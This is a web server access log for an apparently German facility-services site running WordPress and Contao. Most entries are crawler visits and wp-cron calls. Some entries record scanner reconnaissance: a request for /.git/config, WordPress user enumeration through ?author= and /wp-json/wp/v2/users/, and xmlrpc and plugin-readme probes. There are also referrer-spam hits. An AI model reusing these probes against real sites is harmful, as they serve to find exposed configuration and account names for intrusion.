74.80.208.0 - - [10/Mar/2025:07:37:18 +0100] "GET /wp-content/uploads/2021/05/light-3121618_1920.jpg HTTP/2.0" 404 2673 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
144.126.146.0 - - [10/Mar/2025:07:37:26 +0100] "GET /.git/config HTTP/1.1" 404 2553 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:38:26 +0100] "POST /wp-cron.php?doing_wp_cron=1741588706.8712909221649169921875 HTTP/1.1" 200 - "-" "88sRxttmZeOk"
74.80.208.0 - - [10/Mar/2025:07:38:26 +0100] "GET /unterhaltsreinigung/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:39:38 +0100] "POST /wp-cron.php?doing_wp_cron=1741588778.2523670196533203125000 HTTP/1.1" 200 - "-" "I5MFSbOMyRn3"
74.80.208.0 - - [10/Mar/2025:07:39:38 +0100] "GET /prjekte/vogel-taubenabwehrprojekt/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:39:43 +0100] "GET /prjekte/einbruchschutz/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:39:59 +0100] "GET /prjekte/vogel-taubenabwehrprojekt/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.65.90.0 - - [10/Mar/2025:07:40:14 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--rakn-f0a1446b.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
184.178.172.0 - - [10/Mar/2025:07:40:33 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr9-onb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
54.36.148.0 - - [10/Mar/2025:07:40:54 +0100] "GET /contao/vendor/oyejorge/less.php/?C=M;O=A HTTP/2.0" 200 4414 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
72.195.34.0 - - [10/Mar/2025:07:41:03 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr7-onb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:41:11 +0100] "POST /wp-cron.php?doing_wp_cron=1741588871.2653861045837402343750 HTTP/1.1" 200 - "-" "DZBwRiXuP2L3"
74.80.208.0 - - [10/Mar/2025:07:41:11 +0100] "GET /rauchmelder/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:41:54 +0100] "POST /wp-cron.php?doing_wp_cron=1741588914.7910261154174804687500 HTTP/1.1" 200 - "-" "G79jHiUDo0y6"
74.80.208.0 - - [10/Mar/2025:07:41:54 +0100] "GET /prjekte/brandschutz/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:42:22 +0100] "POST /wp-cron.php?doing_wp_cron=1741588942.7487359046936035156250 HTTP/1.1" 200 - "-" "CbvOjW8CszyQ"
74.80.208.0 - - [10/Mar/2025:07:42:22 +0100] "GET /category/allgemein/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:42:51 +0100] "GET /brandschutz/dienstleistungen/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:45:35 +0100] "POST /wp-cron.php?doing_wp_cron=1741589135.3301250934600830078125 HTTP/1.1" 200 - "-" "0v7z8LdDv4uM"
74.80.208.0 - - [10/Mar/2025:07:45:35 +0100] "GET /co2-warnmelder/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:07:45:47 +0100] "GET /robots.txt HTTP/1.1" 404 2555 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:07:45:47 +0100] "GET /contao/vendor/webimpress/safe-writer/src/ HTTP/1.1" 200 468 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.6.232.0 - - [10/Mar/2025:07:46:53 +0100] "GET / HTTP/1.1" 200 730 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
66.249.66.0 - - [10/Mar/2025:07:47:48 +0100] "GET /contao/assets/ace/js/ HTTP/1.1" 200 1160 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
184.178.172.0 - - [10/Mar/2025:07:48:15 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr9-onb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
208.65.90.0 - - [10/Mar/2025:07:48:20 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krken15-bn4c.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
66.249.66.0 - - [10/Mar/2025:07:50:33 +0100] "GET /contao/vendor/egulias/email-validator/src/Exception/NoLocalPart.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:51:07 +0100] "POST /wp-cron.php?doing_wp_cron=1741589466.9372808933258056640625 HTTP/1.1" 200 - "-" "6tCMEaQ5MAJ5"
74.80.208.0 - - [10/Mar/2025:07:51:06 +0100] "GET /rauchmelder/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:07:51:14 +0100] "GET /contao/vendor/twig/twig/src/Util/TemplateDirIterator.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:51:24 +0100] "POST /wp-cron.php?doing_wp_cron=1741589484.0001599788665771484375 HTTP/1.1" 200 - "-" "Z9ONri0Z3Bog"
74.80.208.0 - - [10/Mar/2025:07:51:23 +0100] "GET /vogel-taubenabwehr/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:07:52:12 +0100] "GET /contao/vendor/lexik/maintenance-bundle/Resources/config/ HTTP/1.1" 200 466 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:53:13 +0100] "POST /wp-cron.php?doing_wp_cron=1741589593.5994760990142822265625 HTTP/1.1" 200 - "-" "qTWl6LiA02xL"
74.80.208.0 - - [10/Mar/2025:07:53:13 +0100] "GET /vogel-taubenabwehr/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:54:00 +0100] "GET /impressum/favicon/favicon-152.png HTTP/2.0" 200 48541 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
169.150.247.0 - - [10/Mar/2025:07:55:58 +0100] "GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:56:08 +0100] "POST /wp-cron.php?doing_wp_cron=1741589768.6651890277862548828125 HTTP/1.1" 200 - "-" "30zqOOAY6fZd"
74.80.208.0 - - [10/Mar/2025:07:56:08 +0100] "GET /vogel-taubenabwehr/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:56:13 +0100] "POST /wp-cron.php?doing_wp_cron=1741589773.7872419357299804687500 HTTP/1.1" 200 - "-" "UZU67LOISPpu"
74.80.208.0 - - [10/Mar/2025:07:56:13 +0100] "GET /kontaktformular/allgemeine-geschaeftsbedingungen/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:56:18 +0100] "GET /prjekte/vogel-taubenabwehrprojekt/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:56:48 +0100] "GET /prjekte/objektwartung-in-immobilien-durch-den-objektservice/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:07:57:24 +0100] "GET /contao/vendor/thecodingmachine/safe/deprecated/mssql.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.102.51.0 - - [10/Mar/2025:07:57:25 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr12-rzb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:57:37 +0100] "POST /wp-cron.php?doing_wp_cron=1741589857.0460278987884521484375 HTTP/1.1" 200 - "-" "YXMmeyWrRqrr"
74.80.208.0 - - [10/Mar/2025:07:57:36 +0100] "GET /hausmeisterservice/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:07:58:06 +0100] "GET /sicherheitstechnik/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:07:58:09 +0100] "GET /contao/vendor/toflar/psr6-symfony-http-cache-store/tests/Psr6StoreTest.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:07:59:10 +0100] "GET /contao/system/modules/pct_theme_installer/languages/ HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:07:59:17 +0100] "GET /contao/vendor/symfony-cmf/routing-bundle/src/Validator/Constraints/RouteDefaultsTemplatingValidator.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:07:59:33 +0100] "POST /wp-cron.php?doing_wp_cron=1741589973.7742528915405273437500 HTTP/1.1" 200 - "-" "amtfpsfS22pt"
74.80.208.0 - - [10/Mar/2025:07:59:33 +0100] "GET /sicherheitstechnik/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
13.89.124.0 - - [10/Mar/2025:07:59:40 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:00:52 +0100] "POST /wp-cron.php?doing_wp_cron=1741590052.7000439167022705078125 HTTP/1.1" 200 - "-" "lAIbeOQht547"
74.80.208.0 - - [10/Mar/2025:08:00:52 +0100] "GET /impressum/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:01:03 +0100] "GET /newsletter/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:01:26 +0100] "POST /wp-cron.php?doing_wp_cron=1741590085.9634680747985839843750 HTTP/1.1" 200 - "-" "WpY41p2ggQ7Y"
74.80.208.0 - - [10/Mar/2025:08:01:25 +0100] "GET /wp-content/plugins/email-subscribers/lite/public/images/spinner.gif HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:01:34 +0100] "GET /austragen/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:02:27 +0100] "POST /wp-cron.php?doing_wp_cron=1741590147.6400840282440185546875 HTTP/1.1" 200 - "-" "80h99I0QrnUA"
74.80.208.0 - - [10/Mar/2025:08:02:27 +0100] "GET /sicherheitstechnik/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:02:37 +0100] "GET /definition-unterhaltsreinigung/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:02:40 +0100] "GET /prjekte/brandschutz/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:02:53 +0100] "GET /trockenbauarbeiten/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:04:45 +0100] "POST /wp-cron.php?doing_wp_cron=1741590285.0518670082092285156250 HTTP/1.1" 200 - "-" "fUXxRJdRX0jk"
74.80.208.0 - - [10/Mar/2025:08:04:44 +0100] "GET /prjekte/einbruchschutz/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.102.51.0 - - [10/Mar/2025:08:05:13 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krken12-bn4c.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
184.178.172.0 - - [10/Mar/2025:08:05:33 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr2-onb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
208.65.90.0 - - [10/Mar/2025:08:05:38 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--ra-ypa.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:06:23 +0100] "POST /wp-cron.php?doing_wp_cron=1741590383.8857429027557373046875 HTTP/1.1" 200 - "-" "bUAB4fgLOuRh"
74.80.208.0 - - [10/Mar/2025:08:06:23 +0100] "GET /danke-fuer-ihre-eintragung/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:07:05 +0100] "GET /hausmeisterservice/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:07:14 +0100] "GET /contao/vendor/thecodingmachine/safe/generated/ssdeep.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:08:07:15 +0100] "GET /robots.txt HTTP/1.1" 404 2551 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:08:07:16 +0100] "GET /contao/vendor/michelf/php-markdown/test/resources/markdown.mdtest/Inline%20HTML%20comments.html HTTP/1.1" 200 128 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.53 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.36.148.0 - - [10/Mar/2025:08:07:34 +0100] "GET /contao/vendor/oyejorge/less.php/?C=N;O=D HTTP/2.0" 200 4412 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:08:24 +0100] "POST /wp-cron.php?doing_wp_cron=1741590504.7126450538635253906250 HTTP/1.1" 200 - "-" "SHFIiNqRG8uW"
74.80.208.0 - - [10/Mar/2025:08:08:24 +0100] "GET /kontaktformular/nicht-erlaubt/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:08:26 +0100] "GET /rauchmelder/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:08:39 +0100] "GET /brandschutz/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:09:16 +0100] "POST /wp-cron.php?doing_wp_cron=1741590555.9343039989471435546875 HTTP/1.1" 200 - "-" "ZLZKPUF6ZRWm"
74.80.208.0 - - [10/Mar/2025:08:09:15 +0100] "GET /prjekte/einbruchschutz/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:09:18 +0100] "GET /hausmeisterservice/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
169.150.247.0 - - [10/Mar/2025:08:09:33 +0100] "GET / HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:33 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:34 +0100] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:34 +0100] "GET //xmlrpc.php?rsd HTTP/1.1" 403 2431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:34 +0100] "GET / HTTP/1.1" 200 317742 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:35 +0100] "GET //?author=1 HTTP/1.1" 403 2431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:35 +0100] "GET //?author=2 HTTP/1.1" 403 2431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:35 +0100] "GET //wp-json/wp/v2/users/ HTTP/1.1" 403 2431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:35 +0100] "GET //wp-json/oembed/1.0/embed?url=https://www.gebaeudetechnik.nrw/ HTTP/1.1" 200 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
64.225.21.0 - - [10/Mar/2025:08:09:35 +0100] "POST //xmlrpc.php HTTP/1.1" 403 2431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
185.228.132.0 - - [10/Mar/2025:08:10:04 +0100] "GET /reports/usage_202402.html HTTP/1.0" 200 91181 "https://seattle-towncar.com/private-transfer-from-seatac-airport-to-vancouver-canada/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
66.249.66.0 - - [10/Mar/2025:08:11:05 +0100] "GET /contao/vendor/codefog/contao-haste/languages/en/ HTTP/1.1" 200 460 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:11:57 +0100] "POST /wp-cron.php?doing_wp_cron=1741590717.2037510871887207031250 HTTP/1.1" 200 - "-" "wR9WArwBxk2n"
74.80.208.0 - - [10/Mar/2025:08:11:57 +0100] "GET /impressum/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:12:16 +0100] "GET /contao/vendor/php-http/message/src/Authentication/AutoBasicAuth.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.181.3.0 - - [10/Mar/2025:08:12:45 +0100] "GET /reports/usage_202402.html HTTP/1.0" 200 91181 "https://seattlexlimo.com/bothell-airport-limo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
66.249.66.0 - - [10/Mar/2025:08:13:12 +0100] "GET /contao/vendor/symfony/var-dumper/Caster/DoctrineCaster.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.53 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:13:56 +0100] "POST /wp-cron.php?doing_wp_cron=1741590836.2105989456176757812500 HTTP/1.1" 200 - "-" "e0gqozwrhJtF"
74.80.208.0 - - [10/Mar/2025:08:13:56 +0100] "GET /brandschutz/dienstleistungen/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
68.71.245.0 - - [10/Mar/2025:08:14:06 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--v14-7ua.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:14:15 +0100] "POST /wp-cron.php?doing_wp_cron=1741590855.6709859371185302734375 HTTP/1.1" 200 - "-" "S3B4Qf8LU3de"
74.80.208.0 - - [10/Mar/2025:08:14:15 +0100] "GET /prjekte/vogel-taubenabwehrprojekt/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.102.51.0 - - [10/Mar/2025:08:14:29 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krken15-bn4c.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:15:52 +0100] "POST /wp-cron.php?doing_wp_cron=1741590952.1343500614166259765625 HTTP/1.1" 200 - "-" "bDwCggaKXLKV"
74.80.208.0 - - [10/Mar/2025:08:15:52 +0100] "GET /kontaktformular/allgemeine-geschaeftsbedingungen/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:16:59 +0100] "POST /wp-cron.php?doing_wp_cron=1741591019.0130059719085693359375 HTTP/1.1" 200 - "-" "9rIriew6zSu5"
74.80.208.0 - - [10/Mar/2025:08:16:58 +0100] "GET /bueroreinigung/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:18:00 +0100] "POST /wp-cron.php?doing_wp_cron=1741591080.5927150249481201171875 HTTP/1.1" 200 - "-" "hzmpK6m7CJL1"
74.80.208.0 - - [10/Mar/2025:08:18:00 +0100] "GET /brandschutz/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:18:38 +0100] "POST /wp-cron.php?doing_wp_cron=1741591118.1727070808410644531250 HTTP/1.1" 200 - "-" "maQkZMoMYfwD"
74.80.208.0 - - [10/Mar/2025:08:18:38 +0100] "GET /unterhaltsreinigung/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:19:33 +0100] "GET /contao/vendor/symfony/framework-bundle/Test/MailerAssertionsTrait.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
